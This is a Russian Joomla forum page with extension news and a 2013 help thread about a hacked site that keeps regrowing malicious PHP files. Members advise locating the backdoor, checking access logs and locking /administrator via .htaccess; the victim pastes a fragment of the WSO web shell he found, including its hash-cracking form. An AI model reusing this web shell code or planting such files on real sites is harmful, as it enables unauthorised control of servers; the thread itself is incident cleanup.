Новости Joomla

Плагин - «Конвертация таблиц в сетку Bootstrap 5» для Joomla 5

👩‍💻 Плагин - «Конвертация таблиц в сетку Bootstrap 5» для Joomla 5.Работает везде, где работают плагины группы content. Проверено в материалах, модулях, в описаниях товаров JoomShopping.Плагин конвертирует любую таблицу в адаптивную блочную сетку Bootstrap 5.В админке, в редакторе создаете таблицу, размещает в её ячейках контент, а на сайте эта таблица выводиться как адаптивная сетка из блоков. На мобильных устройствах контент размещенный в таблице будет виден и ничто не вылезет за пределы сайта как раньше.Версия плагина: 1.0.0. Разработчик предупреждает, что плагин пока не корректно работает со сложными таблицами (где много объединенных ячеек или столбцов) - данная проблема будет решена в следующих версиях. В дальнейшем планируется также добавление настроек.Стоимость: 2 500р. Тем, кто даст обратную связь по работе плагина и развёрнутый комментарий, тот получит скидку в 50% на любое другое платное расширение разработчика или сможет сделать заказ на разработку по льготной цене.Разработчик - участник нашего сообщества Дмитрий (@kit2m2).ПодробнееСайт разработчика@joomlafeed#joomla #JoomShopping #расширения

JoomShaper SP Page Builder 6: динамический контент, комментарии и Joomla 6

JoomShaper SP Page Builder 6: динамический контент, комментарии и Joomla 6

JoomShaper SP Page Builder 6: динамический контент, комментарии и Joomla 6.Анонсирован выход новой версии одного из самых распространённых конструкторов страниц на Joomla от студии JoomShaper.v.6.0.0. Что нового?Динамический контент. Добавлена ​​поддержка материалов Joomla в динамическом контенте.➕ Новые комментарии для Joomla. Введена встроенная система комментирования статей.➕ Плагин аватара пользователя. Включена поддержка изображений профиля через плагин SP Page Builder - Profile Image.🫥 Обновление: Добавлена ​​совместимость с моделями GPT-5.🫥 Обновление: добавлена ​​опция приоритета извлечения в надстройку «Изображение». 🫥 Обновление: улучшена скорость загрузки динамического контента.🫥 Обновление: включена поддержка вертикального видео в модулях «Видео» и «Модальные всплывающие окна».🛠 Исправление: исправлены ошибки, из-за которых дополнения к формам не работали на страницах динамических сведений.🛠 Исправление: устранены проблемы с разрывом макета и всплывающими окнами при разбиении на страницы динамической медиагалереи.🛠 Исправление: решена проблема с неработоспособностью списка ссылок на страницы в редакторе интерфейса.🛠 Исправление: Исправлены проблемы с маршрутизацией многоязычных страниц SEF.🛠 Исправление: устранена уязвимость критического обхода пути в Media Manager.Большое спасибо за ссылку участнику нашего сообщества Ринату Кажетову (@rkazhet)!Новость на сайте JoomShaper.@joomlafeed#joomla #расширения #шаблоны

0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 10432 Просмотров
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
Доброе время суток
 столкнулся с данной проблемой

письмо от хостера

Обращаем Ваше внимание на то, что на Вашем аккаунте опять было обнаружено
вредоносное содержимое.

Примеры вредоносных скриптов:

/administrator/index.1.php
/administrator/index.bak.php
/administrator/index.class.php
/administrator/index.inc.php


Убедительная просьба в кратчайшие сроки проверить аккаунт на наличие
вредоносного содержимого и внимательно следить за работой своего аккаунта.
В случае повторения ситуации, работа аккаунта будет приостановлена.

я их удалил
но все повторилось

причем в папке administrator/

создаются очень много файлов
во такого названия

   
lock41f6601ff986f6d7126ac8e41e57885a
21 B   -rw-r--r--   
   
res0edfd385c41fca147c559328d544ce4a
8.59 KB   -rw-r--r--   
   
res41f6601ff986f6d7126ac8e41e57885a
1.03 KB   -rw-r--r--   

если кто сталкивался подскажите буду признателен материально
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Вы удаляете файлы, а нужно еще удалить шелл, бекдор, с помощью которого заливаются эти левые файлы.
Сканеры и инструменты защиты Joomla, в разделе Безопасность.
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
сканировал по удалял
а они как грибы
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
поудалял пишется слитно.

Нужно не симптомы лечить, а болезнь. В вашем случае надо найти шелл, бэкдор ... вам выше написали
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
не подскажите чем?
AD Search&Replace чтото не чего не дал
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
не подскажите чем?
Подсказать-то можно, только без обид. Удалять нужно головой.
Всё остальное - инструменты, которые могут быть разными или не быть вовсе.
Универсального рецепта, гарантирующего успех, и пошаговой инструкции "что" и "как" делать - нет и быть не может в принципе.
Это вам не Касперский, тут думать надо (с) wishlight

Для начала поставь на директорию /administrator Basic-пароль и включи запись логов доступа (http, ftp), если не включена.
Потом убей вражеские файлы и начинай читать логи. Если не понимаешь, что в логах искать - ищи человека, который понимает.
Любые "искалки" - полумера, никаких гарантий не дающая. Правильно настроенная голова даст им всем фору.
Но правильная настройка головы "с нуля" занимает годы. Поэтому реши, нужно ли это тебе, или лучше поручить кому-то.
« Последнее редактирование: 14.03.2013, 15:47:36 от WebDisaster »
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
Вы сможете это сделать?
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
NHL09, ответ в личных сообщениях.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
сканировал по удалял а они как грибы
Так закрой админку, создав файл .htaccess  и положи в /administrator. А  будет нужно войти в админку, просто закоментируешь две строки.
Код
####  NO  Enter 
Order Deny,Allow

Deny from all
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
походу нашел
modules\mod_articles/mod_articles.php01
имено имя было фала mod_articles.php01
его содержимое
Спойлер
[свернуть]
« Последнее редактирование: 19.03.2013, 16:25:25 от NHL09 »
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
if(@$_POST['p3'])
      wsoRecursiveGlob($_POST['c']);
   echo "</div><br><h1>Search for hash:</h1><div class=content>
      <form method='post' target='_blank' name='hf'>
         <input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
         <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
         <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
      </form></div>";
   wsoFooter();
}


но как он мог ко мне попасть?
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
да вы правы не все
опять файлы лезут
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
все вроде победил
много файлов было с окончанием
.1.php
.class.php
.bak.php
.inc.php

в папках  \cli
\includes
\libraries
и д.р.
  удалил все в папках и заменил из чистой Joomla
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

опять вирус ?

Автор mami_

Ответов: 15
Просмотров: 1407
Последний ответ 07.09.2017, 06:20:29
от voland
взломали сайт: подменили содержимое для п

Автор TopClans

Ответов: 10
Просмотров: 1801
Последний ответ 06.05.2016, 10:32:45
от Missile
Пишут, что опять уязвимость найдена

Автор dmtn

Ответов: 9
Просмотров: 3664
Последний ответ 16.12.2015, 20:08:52
от flyingspook
Как назначить странице 403 HTTP заголовок, при этом чтобы посетители видели содержимое страницы?

Автор andrey222

Ответов: 8
Просмотров: 1892
Последний ответ 15.03.2015, 10:56:59
от andrey222
Опять три дня ломятся на сайты

Автор busik

Ответов: 21
Просмотров: 2331
Последний ответ 26.11.2014, 05:28:32
от ander_axel